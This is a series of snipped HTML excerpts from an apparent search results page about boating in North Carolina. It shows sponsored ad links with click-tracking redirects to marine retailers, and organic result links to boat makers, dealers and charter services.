<a href="http://www.google.com/aclk?sa=l&ai=CeeE_V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&sig=AGiWqtynVrQkkCY4fAwgSwdvdIKSErEzvw&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(25); if (typeof efclk != 'undefined') efclk(25); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=CeeE_V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&sig=AGiWqtynVrQkkCY4fAwgSwdvdIKSErEzvw&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(25); if (typeof efclk != 'undefined') efclk(25); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CReD1V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QiNPko-Gw6u2JPuwlnrK2VvpZ8778wARqZaqRaw&num=3&ctype=4&sig=AGiWqtwsG6fo1b8kmxFlizRKhNggK1UJLQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(25); if (typeof efclk != 'undefined') efclk(25); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CReD1V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QiNPko-Gw6u2JPuwlnrK2VvpZ8778wARqZaqRaw&num=3&ctype=4&sig=AGiWqtwsG6fo1b8kmxFlizRKhNggK1UJLQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=C8feXV8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&ctype=4&sig=AGiWqtymI66e1--MkLsq-RQr0NLZqGfy6w&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(25); if (typeof efclk != 'undefined') efclk(25); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=C8feXV8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&ctype=4&sig=AGiWqtymI66e1--MkLsq-RQr0NLZqGfy6w&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CAoI6V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&ctype=4&sig=AGiWqtw9y8Fbq_siTteLh4EmlzDxcKyd6g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(25); if (typeof efclk != 'undefined') efclk(25); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CAoI6V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&ctype=4&sig=AGiWqtw9y8Fbq_siTteLh4EmlzDxcKyd6g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CzU7NV8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QiNPko-Gw6u2JPuwlnrK2VvpZ8778wARqZaqRaw&num=3&ctype=4&sig=AGiWqtx3dzYD9VjJzB06Vm2EvuA5uN2jfA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(25); if (typeof efclk != 'undefined') efclk(25); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CzU7NV8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QiNPko-Gw6u2JPuwlnrK2VvpZ8778wARqZaqRaw&num=3&ctype=4&sig=AGiWqtx3dzYD9VjJzB06Vm2EvuA5uN2jfA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CXuOXV8RBTcz9Kou-gweIp7S4D5yQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGgICkJKABgOjN_APIAQGqBBtP0Piu5aPmsOrtiXbsu_EhDG4KUxwYGRKxPak&num=4&sig=AGiWqtxZnmJeoiny_ZDCkxzEKCH2_jHuLA&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(88); if (typeof efclk != 'undefined') efclk(88); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CXuOXV8RBTcz9Kou-gweIp7S4D5yQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGgICkJKABgOjN_APIAQGqBBtP0Piu5aPmsOrtiXbsu_EhDG4KUxwYGRKxPak&num=4&sig=AGiWqtxZnmJeoiny_ZDCkxzEKCH2_jHuLA&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(88); if (typeof efclk != 'undefined') efclk(88); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CcR1kV8RBTcz9Kou-gweIp7S4D6n3pJ4B5ZrwpxLfgdAFEAUg-_6BAygFUNvdkej7_____wFgyYaAgKQkyAEBqgQYT9Cot-aj57Dq7Ykv7QHJ0QaBrLbOrU7e&num=5&sig=AGiWqtyla0qgW6YU8dJdxM3oC9nd8PaXgA&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(98); if (typeof efclk != 'undefined') efclk(98); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_4');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CcR1kV8RBTcz9Kou-gweIp7S4D6n3pJ4B5ZrwpxLfgdAFEAUg-_6BAygFUNvdkej7_____wFgyYaAgKQkyAEBqgQYT9Cot-aj57Dq7Ykv7QHJ0QaBrLbOrU7e&num=5&sig=AGiWqtyla0qgW6YU8dJdxM3oC9nd8PaXgA&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(98); if (typeof efclk != 'undefined') efclk(98); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'top',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_4');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<td>

<a id="r1_t" href="http://www.regulatormarine.com/quality.html"
onmousedown="return fp(this,{en:'in',io:'0',b:'a002',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r2_t" href="http://www.starlingmarine.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a003',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Starling Marine - Wilmington <b>
...[SNIP]...
<td>

<a id="r3_t" href="http://www.atlanticmarinesales.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a004',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Atlantic Marine Sales » Wrightsville Beach, <b>
...[SNIP]...
<td>

<a id="r4_t" href="http://govguru.com/north-carolina/boat-registration"
onmousedown="return fp(this,{en:'te',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r5_t" href="http://www.tunaduck.com/boat.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Tuna Duck Charter Fishing <b>
...[SNIP]...
<td>

<a id="r6_t" href="http://www.tunaduck.com/links.html"
onmousedown="return fp(this,{en:'in',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dlxlx'},'false',0)" class="title txt_lg" target="_blank" >Tuna Duck Charter Fishing <b>
...[SNIP]...
<td>

<a id="r7_t" href="http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r8_t" href="http://www.marine-world.com/brokers/589.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Atlantic Marine Sales - is your coastal <b>
...[SNIP]...
<td>

<a id="r9_t" href="http://companydatabase.org/c/communications-services-nec/marine-operators/marine-offshore/quality-marine/north-carolina/manufacturing-facility/regulator-marine.html"
onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank" >Company: <b>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=Cm47CV8RBTcz9Kou-gweIp7S4D8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QyO3vo-O46wyLTQ9JmSzi2yUCEUU&num=1&sig=AGiWqtyhTC0jFG4wfWy9ja8wUS0dXQ_rbg&adurl=http://www.AtlanticMarineSales.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(30); if (typeof efclk != 'undefined') efclk(30); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_0');" class="nu" onmouseover="return ss('www.atlanticmarinesales.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Cm47CV8RBTcz9Kou-gweIp7S4D8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QyO3vo-O46wyLTQ9JmSzi2yUCEUU&num=1&sig=AGiWqtyhTC0jFG4wfWy9ja8wUS0dXQ_rbg&adurl=http://www.AtlanticMarineSales.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(30); if (typeof efclk != 'undefined') efclk(30); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_0');" class="nu" onmouseover="return ss('www.atlanticmarinesales.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CtkeBV8RBTcz9Kou-gweIp7S4D4621OUB7uvvmhLdt9ykCBACIPv-gQMoBVC5o66U-_____8BYMmGgICkJKAB4Nuj_gPIAQGqBCFP0Pji8aPgsOvtiXbsu-Aga0dR6ctO9i-ij7cfxqfrRJU&num=2&sig=AGiWqtyKihDbkXNH3nuPRKhk30LbgBpTJQ&adurl=http://www.boattrader.com/search-results/State-NC%257CNorth%2520Carolina/NewOrUsed-any/Type-any/Sort-Length:DESC/%3Fcmp%3DGoogle" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(30); if (typeof efclk != 'undefined') efclk(30); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_1');" class="nu" onmouseover="return ss('<b>boat</b>trader.com/<b>North_Carolina</b>')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=CtkeBV8RBTcz9Kou-gweIp7S4D4621OUB7uvvmhLdt9ykCBACIPv-gQMoBVC5o66U-_____8BYMmGgICkJKAB4Nuj_gPIAQGqBCFP0Pji8aPgsOvtiXbsu-Aga0dR6ctO9i-ij7cfxqfrRJU&num=2&sig=AGiWqtyKihDbkXNH3nuPRKhk30LbgBpTJQ&adurl=http://www.boattrader.com/search-results/State-NC%257CNorth%2520Carolina/NewOrUsed-any/Type-any/Sort-Length:DESC/%3Fcmp%3DGoogle" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(30); if (typeof efclk != 'undefined') efclk(30); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_1');" class="nu" onmouseover="return ss('<b>boat</b>trader.com/<b>North_Carolina</b>')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CeeE_V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&sig=AGiWqtynVrQkkCY4fAwgSwdvdIKSErEzvw&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(85); if (typeof efclk != 'undefined') efclk(85); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br/>
<a href="http://www.google.com/aclk?sa=l&ai=CeeE_V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUPeXq-oFYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&sig=AGiWqtynVrQkkCY4fAwgSwdvdIKSErEzvw&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boat_parts" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(85); if (typeof efclk != 'undefined') efclk(85); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CReD1V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QiNPko-Gw6u2JPuwlnrK2VvpZ8778wARqZaqRaw&num=3&ctype=4&sig=AGiWqtwsG6fo1b8kmxFlizRKhNggK1UJLQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(85); if (typeof efclk != 'undefined') efclk(85); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CReD1V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QiNPko-Gw6u2JPuwlnrK2VvpZ8778wARqZaqRaw&num=3&ctype=4&sig=AGiWqtwsG6fo1b8kmxFlizRKhNggK1UJLQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=C8feXV8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&ctype=4&sig=AGiWqtymI66e1--MkLsq-RQr0NLZqGfy6w&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(85); if (typeof efclk != 'undefined') efclk(85); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=C8feXV8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&ctype=4&sig=AGiWqtymI66e1--MkLsq-RQr0NLZqGfy6w&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CAoI6V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&ctype=4&sig=AGiWqtw9y8Fbq_siTteLh4EmlzDxcKyd6g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(85); if (typeof efclk != 'undefined') efclk(85); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CAoI6V8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0IjT5KPhsOrtiT7sJZ6ytlb6WfO-_MAEamWqkWs&num=3&ctype=4&sig=AGiWqtw9y8Fbq_siTteLh4EmlzDxcKyd6g&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CzU7NV8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QiNPko-Gw6u2JPuwlnrK2VvpZ8778wARqZaqRaw&num=3&ctype=4&sig=AGiWqtx3dzYD9VjJzB06Vm2EvuA5uN2jfA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(85); if (typeof efclk != 'undefined') efclk(85); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CzU7NV8RBTcz9Kou-gweIp7S4D9vO8tsBi8y6yxe9rLMHEAMg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QiNPko-Gw6u2JPuwlnrK2VvpZ8778wARqZaqRaw&num=3&ctype=4&sig=AGiWqtx3dzYD9VjJzB06Vm2EvuA5uN2jfA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CXuOXV8RBTcz9Kou-gweIp7S4D5yQkeEBpIyLrBTc66IsEAQg-_6BAygFUKuO7fEFYMmGgICkJKABgOjN_APIAQGqBBtP0Piu5aPmsOrtiXbsu_EhDG4KUxwYGRKxPak&num=4&sig=AGiWqtxZnmJeoiny_ZDCkxzEKCH2_jHuLA&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(1); if (typeof efclk != 'undefined') efclk(1); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye'},'gg_3');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
